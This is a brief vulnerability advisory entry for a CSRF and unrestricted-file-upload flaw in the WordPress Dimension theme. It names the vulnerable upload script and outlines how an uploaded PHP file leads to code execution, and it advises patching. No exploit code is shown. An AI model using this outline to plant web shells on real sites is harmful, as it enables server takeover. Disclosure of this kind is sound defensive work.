Vendor: WordPress Dimension Themes
By: DevilScreaM
CVSS: 7.5 (HIGH)
CWE: 352 (CSRF)
Product Name: WordPress Dimension Themes
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Mozilla, Chrome, Opera -> Windows & Linux
Year: 2013
WordPress Dimension Themes CSRF File Upload Vulnerability
A Cross-Site Request Forgery (CSRF) vulnerability exists in the WordPress Dimension Themes. An attacker can exploit it to upload arbitrary PHP code and execute it in the context of the web server process. The root cause is insufficient validation of the uploaded file type in the upload-handler.php script in the library/includes directory: a crafted POST request to that script can place a malicious PHP file on the server, and the uploaded file can then be requested directly from the uploads directory.
Mitigation:
The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the WordPress Dimension Themes.